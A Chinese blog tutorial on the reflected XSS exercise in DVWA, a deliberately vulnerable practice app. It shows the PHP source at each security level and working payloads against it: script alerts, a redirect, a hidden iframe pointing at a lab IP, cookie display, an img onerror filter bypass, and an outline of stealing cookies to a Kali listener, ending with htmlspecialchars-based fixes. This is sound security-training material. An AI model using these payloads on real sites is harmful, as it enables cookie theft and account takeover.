DVWA-XSS (Reflected)

已于 2022-04-25 16:51:26 修改
阅读量268 收藏 1
点赞数 1
分类专栏: DVWA 文章标签: web安全
于 2022-04-25 16:49:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/124397811
版权

目录

简介

XSS(cross-site scripting)

跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击;

XSS可以盗取客户端cookie,将客户端重定向到第三方网站;

客户端脚本语言

弹窗警告、广告;

JavaScript;

在浏览器中执行;

XSS漏洞类型

存储型XSS;(持久型)

 恶意代码被保存到目标网站的服务器中,每次用户访问时都会执行脚本代码,这种攻击具有较强的稳定性和持久性;

反射型XSS;(非持久型)

 恶意代码并没有保存在目标网站,通过引诱用户点击一个恶意链接来实施攻击的;

DOM型XSS

 DOM型XSS是一种基于DOM树的XSS,例如服务器端经常使用document.boby.innerHtml等函数动态生成html页面,如果这些函数在引用某些变量时没有进行过滤或检查,就会产生DOM型的XSS;DOM型XSS可能是存储型,也有可能是反射型;

危害

窃取管理员帐号或Cookie,入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息。
窃取用户的个人信息或者登录帐号,对网站的用户安全产生巨大的威胁。例如冒充用户身份进行各种操作。
网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时,用户的计算机会被植入木马。
发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告,或者发送垃圾信息,严重影响到用户的正常使用。

安全级别:Low

查看源码

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

源码分析

在源码中,可以看到直接引用来 name参数,并没有对参数做任何过滤;例如:输入a,则返回含有a的js页面;

构造弹窗

<script>alert('xss')</script>

在这里插入图片描述
重定向

<script>window.location="http://www.baidu.com"</script>

访问192.168.37.128/a.jpg

<iframe src='http://192.168.37.128/a.jpg' height='0' width='0'></iframe>

获取cookie

<script>alert(document.cookie)</script>

监听

步骤:

1. 制作一个js脚本;

2. 把js脚本放到www目录下;

3. 开启阿帕奇服务;

4. 监听端口;

5. 访问js脚本;

6. 获取到js脚本实现的结果;

首先在Kali上写a.js脚本,开启Apache服务,并监听指定的端口;
在这里插入图片描述
在这里插入图片描述
输入

查看Kali监听到的cookie值;
在这里插入图片描述

安全级别:Medium

查看源码

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

源码分析

<script>过滤,可以使用事件类型标签绕过,也可使用嵌套构造和大小写转换绕过

构造弹窗

<img src=1 onerror=alert('xss') />

在这里插入图片描述
安全级别:High
查看源码

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

源码分析

正则过滤更加完善,不区分大小写,且使用通配符匹配,导致嵌套构造的方法也不能成功,但依旧可以使用事件类型标签或伪协议的方法

构造弹窗

<img src=1 onerror=alert('xss') />

在这里插入图片描述

安全级别:Impossible

查看源码

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

源码分析

name变量通过htmlspecialchars()函数被HTML实体化后输出在了标签中,目前来说没有什么的姿势可以绕过,如果这个输出在一些标签内的话,还是可以尝试绕过的
当安全级别为Impossible时,使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,防止浏览器将其作为HTML元素(特殊意义)

防护总结

转义字符输出
白名单验证
HTML实体化

空白行
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA 之 XSS(Reflected)反射型XSS
RexHa的博客
10-07 2019
dvwa 反射型XSS
DVWA XSS(Reflected)
m0_56107268的博客
04-30 230
XSS(Reflected)# "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code
dvwa———xss(全)
最新发布
GZY0601的博客
09-28 1541
这个章节我们来讲一下xss攻击XSS 又称CSS(Cross Site Scripting)或跨站脚本攻击,攻击者在网页中插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。xss有三种:反射型(Reflected),存储型(Stored)和DOM型反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库)存储型XSS:将用户输入的数据存储在服务器端。
DVWA之XSS (Reflected)
weixin_42075643的博客
02-07 698
low level view-source: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre&g
DVWA 反射型XSS XSS(Reflected)题解
mirocky的博客
08-04 426
DVWA靶场对反射型XSS的题解,较为详细且扩展性强
DVWA-master.zip
01-04
DVWA-master.zip
DVWA-master.7z 压缩包
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
安全渗透学习-DVWA(XSS-Reflected
重启专家的博客
08-24 244
XSS(Cross Site Script) 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_...
DVWA--XSS详解
洋洋的小黑屋
12-29 8520
DVWA–XSS详解 XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS三种: 反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端。用户访问了带有xss得页面代码后,产生安全问题。 DOM XSS:通过修改页面的D...
DVWA靶场通关(XSS)
m0_56010012的博客
03-22 8962
XSS漏洞 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,缩写:CSS)混淆,所以架构跨站脚本攻击缩写为XSS。XSS就是攻击者在web页面插入恶意的Script代码,当用户浏览该页面时,嵌入其中的js代码会被执行,从而达到恶意攻击的目的。某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚
DVWA-XSS 级别通关详解(图文详细)
m0_60884805的博客
10-18 2617
学过html语言的我们都知道都是双标签,也就是说会识别两个标签之间的语句,那么我们就人为把它闭合起来,在执行过程中,一旦存在一对标签,那么就会执行这里面的语句,无法构成成对标签的不会执行里面的语句,而是单标签,也就是说他要执行的语句涵盖在它里面。>闭合前面
【工具-DVWA】DVWA渗透系列十一:XSS(Reflect)
qqchaozai的专栏
10-26 1864
前言 DVWA安装使用介绍,见:【工具-DVWA】DVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
dvwa-XSS(Reflected)
m0_56267052的博客
01-02 442
XSS(跨站脚本攻击): (实验基础:有php语言和html语言基础) XSS分类: 反射型XSS--->XSS(reflected) 存储型XSS---->XSS(stored) 实验原理: 利用js脚本实行跨站攻击 实验过程: XSS(reflected) 、low 构造恶意脚本:<script>alert(document.cookie)</script>实施攻击---------获取cookie 、Medium 用之前的脚本攻击发现没用,查看p.
DVWA 通关XSS(Reflected
干铮的博客
08-01 459
反射型XSS 非持久性,参数型的跨站脚本 反射型XSS的代码在Web应用参数中,例如搜索框的反射型XSS 注意到,反射型XSS代码出现在keyword参数中 Low 因为没有做任何过滤所以直接用弹窗代码 <script>alert(/xss/)</script> Medium 中级难度对<script>标签做了过滤,可以使用事件绕过 <img src="" onerror=alert(/xss/)> High 高难度是用preg_
DVWA-Xss(reflected)(反射型跨站脚本攻击)
简简的博客
02-02 1686
本系列文集:DVWA学习笔记 反射型Xss &amp;amp;amp;lt;全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。&amp;amp;amp;gt; xss攻击思路 ##Low: 点击右下角的view source,查看源码 分析: arrary_key_exists()函数:判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值...
DVWA - XSS (Reflected) (low, medium, high)
无节操
01-06 1747
low无验证,直接注入<script>alert(document.cookie)</script>medium查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写<Script>alert(document.cookie)</script>high查看源码,可发现用正则过滤了$name
dvwa下xss练手实践
热门推荐
h1012946585的博客
09-07 1万+
xss简介: 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。从而使目标计算机收到危害。 分类: xss漏洞分为三...
DVWA之XSS
谢公子的博客
08-05 1938
  XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。 DOM型的XSS由于其特殊性,常...
XSS——反射型原理和利用
初学者L_言的博客
11-29 5443
工具 服务器——metasploitable2 被攻击机——windows(任意) 攻击机——kali 环境——DVWA 反射型XSS原理 通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端 的攻击。 攻击目标: web客户端 (主要是利用客户端浏览器来运行恶意脚本) 主要脚本语言: javascript 条件: 服务器对用户提交数据过滤不严格 web站点能够返回用户输入的 数据(脚本)...
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值